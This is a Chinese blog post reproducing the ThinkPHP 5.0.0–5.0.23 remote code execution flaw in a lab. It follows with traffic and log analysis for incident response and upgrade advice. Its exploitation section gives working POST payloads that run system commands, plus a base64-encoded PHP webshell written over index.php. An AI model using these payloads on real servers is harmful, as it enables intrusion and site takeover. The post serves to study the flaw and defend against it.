ThinkPHP 5.0.5~5.0.23 远程代码执行漏洞复现及排查

已于 2023-08-11 17:31:59 修改
阅读量1.5k 收藏 1
点赞数
分类专栏: 渗透 应急响应 文章标签: 网络安全 安全 web安全 安全威胁分析
于 2023-08-11 17:29:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/youuzi/article/details/132236836
版权

目录

一、概述

二、影响范围及使用条件

三、漏洞利用

 四、应急分析

五、漏洞修复

一、概述

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

Thinphp团队在实现框架中的核心类Requests的method方法实现了表单请求类型伪装,默认为$_POST[‘_method’]变量,却没有对$_POST[‘_method’]属性进行严格校验,可以通过变量覆盖掉Requets类的属性并结合框架特性实现对任意函数的调用达到任意代码执行的效果。

二、影响范围及使用条件

1、范围

受影响版本:Think PHP 5.0.0-5.0.23
不受影响版本:Think PHP 5.0.24

2、利用条件

版本名是否可被攻击攻击条件
5.0.0
5.0.1
5.0.2
5.0.3
5.0.4
5.0.5
5.0.6
5.0.7
5.0.8无需开启debug
5.0.9无需开启debug
5.0.10无需开启debug
5.0.11无需开启debug
5.0.12无需开启debug
5.0.13需开启debug
5.0.14需开启debug
5.0.15需开启debug
5.0.16需开启debug
5.0.17需开启debug
5.0.18需开启debug
5.0.19需开启debug
5.0.20
5.0.21需开启debug
5.0.22需开启debug
5.0.23需开启debug

三、漏洞利用

1、漏洞poc,网页上构造post包:

利用点:
http://192.168.52.131:8080/index.php?s=captcha

data部分:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

或者:
_method=__construct&filter[]=system&method=get&get[]=pwd

2、使用burpsuite抓包分析,成功响应

3、这里如何getshell呢?

(1)通过覆盖index.php文件内容的方式(因为这里是一定存在index.php文件的,但是存在风险,一旦覆盖后又无法利用,会导致漏洞无法使用)

因为存在过滤,这里我们使用base64加密数据写入shell,同时eval函数没法注入,这里选择assert函数。

#postdata数据
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ2FkbWluJ10pOz8+YmJi== | base64 -d > index.php

 使用蚁剑连接shell,注意要选择char16和base64

 (2)或者选择建立一个新的文件,将内容写入新文件中(建议)

#POST数据:
_method=__construct&filter[]=system&method=get&get[]=echo  "<?php phpinfo();  >"  > test.php

 四、应急分析

那么,在遭受攻击时,我们可以通过哪些角度去分析是否遭受攻击呢?

1、从流量侧分析

如果存在流量监控软件的话,通过分析流量包是可以监测还原整个攻击流程的。

在如下数据包中,发现攻击者先用ls探测了服务器根目录下有哪些文件,由于回包是分块传输,看起来不怎么友好,但是还是能知道是利用成功的

POST /index.php?s=captcha HTTP/1.1
Host: 192.168.52.131:8080
Content-Length: 63
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.52.131:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.52.131:8080/index.php?s=captcha
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

探测完当前目录的文件后,开始查看当前路径

接下来是尝试写入phpinfo脚本文件

总体来说,从流量侧是可以排查到攻击路径的。

2、从日志侧分析

如果没有其他可利用的设备,那么web本身的日志文件是个很重要的排查依据。

因为我这里是docker搭建的靶场环境,所以并没有保存对应的日志文件。正常来说是access.log和/var/www/runtime/log/下文件,里面包含时间,来源IP、URL、请求方式(get、post、put等)、包大小、状态码。

五、漏洞修复

 升级到5.0.24及以上,不用开启debug模式。

dayouziei
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkPHP V5.0.5漏洞_ThinkPHP漏洞分析与利用
weixin_39602280的博客
11-19 2502
一、组件介绍1.1 基本信息ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,遵循Apache 2开源协议发布,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL...
ThinkPHP5 5.0.23 远程代码执行漏洞-分析
zeroc009的博客
02-15 1845
漏洞简述 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 关键代码 @@ -522,8 +522,11 @@ public function method($method = false) return $this->server('REQUEST_METHOD') ?: 'GET'; } elseif (!
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞+webshell工具连接(详细过程)
m0_52701599的博客
03-19 2812
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
ThinkPHP5.0.x远程执行漏洞分析与
最新发布
qq_74148743的博客
05-11 869
2018年12月10日,ThinkPHPv5系列发布安全更新,修了一处可导致远程代码执行的严重漏洞。此次漏洞ThinkPHP v5框架代码问题引起,其覆盖面广,且可直接远程执行任何代码和命令。电子商务行业、金融服务行业、互联网游戏行业等网站使用该ThinkPHP框架比较多,需要格外关注。由于ThinkPHP v5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接进行远程的代码执行,进而获得服务器权限。
实战:通过tp5.0.5漏洞入侵企业网站
weixin_44763740的博客
07-24 698
下一步就是使用蚁剑连接webshell,看到这里,大家都以为可以直接getshell了吧,但是命运就是这么捉弄人,明明已经将木马包含在日志中,并且有绝对路径,相关函数也没有禁用,这一切看起来都是那么顺利,可就是连接失败。后来我又尝试换冰蝎马,但是因上传做了字符串限制,只能用最简单的一句话木马,其余多一个字符串都会被截掉,那么会不会是编码器的问题呢?以上可知,木马已存在,且路径正确,那一定是连接出问题了。我是身上有点执念的,为了梦想也好,目标也罢,有时候,你不去较劲儿,永远不知道自己能改变什么。
Thinkphp5.0.x 文件包含漏洞
weixin_61785633的博客
07-30 576
这个漏洞的不是很完善,按网上的教程,传入图片码是可以被解析为php文件,从而实攻击,但是我尝试了几次都不成功,目前还不知道是为什么。
[]Thinkphp5系列漏洞
kuuhh的博客
08-05 6853
SQL注入 parseData方法 本次漏洞存在于 Builder 类的 parseData 方法中。由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生。漏洞影响版本: 5.0.13<=ThinkPHP<=5.0.15 、 5.1.0<=ThinkPHP<=5.1.5 。 测试代码,我这里用的版本是 ThinkPHP 5.0.15 public function index() { update / insert 方法
ThinkPHP5系列远程代码执行漏洞(详细)
weixin_53730939的博客
03-20 8255
ThinkPHP5系列远程代码执行漏洞(详细)
ThinkPHP5 5.0.23远程代码执行漏洞
DXfighting_的博客
04-15 1372
利用搜狐的hackbar在网页构造payload, 查看当前目录 获得目录路径后尝试上传一句话木马,发被拦截无法上传,采用base64加密绕过,并验证是否上传成功 上传成功使用蚁剑进行连接 ...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE)漏洞,该漏洞允许攻击者在服务器上执行任意代码。 该漏洞是由于 ThinkPHP 的路由机制存在缺陷,攻击者可以通过构造特殊的 URL 来...
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
网络安全---渗透测试---框架漏洞-ThinkPHP5.0、Struts2
weixin_52796034的博客
11-05 832
反弹shell(Reverse Shell)是一种计算机安全和网络攻击技术,通常被用于与远程目标系统建立命令行交互式连接。这个连接允许攻击者在远程系统上执行命令,获取系统访问权限,以及进行横向移动和数据操作。反弹shell的工作方式如下:攻击者和目标系统之间建立连接:通常,攻击者首先在目标系统上部署一个恶意程序(例如Trojan或后门),该程序会与攻击者的控制服务器建立连接。目标系统反弹连接:一旦恶意程序在目标系统上执行,它会尝试与攻击者的控制服务器建立连接。
ThinkPHP V5.0.5漏洞_ThinkPHP5丨远程代码执行漏洞动态分析
weixin_39756192的博客
11-19 1130
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,在保持出色的性能和至简代码的同时,也注重易用性。但是简洁易操作也会出漏洞,之前ThinkPHP官方修了一个严重的远程代码执行漏洞。这个漏洞的主要原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令,受影响的版本包括5.0和5.1版本。那么今天i春秋用动态分析法来介绍远...
Thinkphp5.0.23-rce漏洞
qq_64875725的博客
06-02 2426
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
Think PHP 5 RCE漏洞排查
dayouzi的博客
08-11 2253
ThinkPHP是一款运用极广的PHP开发框架。其漏洞点是由于ThinkPHP框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞
ThinkPHP 5.0远程命令执行漏洞分析与
weixin_35771144的博客
02-27 1034
0x00 前言   ThinkPHP官方2018年12月9日发布重要的安全更新,修了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。 0x01 影响范围 ThinkPHP 5.0.5-5.0.22 ThinkPHP 5.1...
[代码审计]ThinkPHP5的文件包含漏洞
姜小孩的博客
06-14 1066
目录漏洞影响范围漏洞分析POC我用的是5.1.15环境配置要将将 application/index/controller/Index.php 文件代码设置如下: 创建 application/index/view/index/index.html 文件,内容随意(没有这个模板文件的话,在渲染时程序会报错)先跟进assign方法再跟进array_merge() 函数用于把一个或多个数组合并为一个数组。只是赋值操作,跟进下面的fetch继续跟进用于引用当前对象。用于引用当前类。换句话说, 用于非静态成
thinkphp5.0.23rce漏洞
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值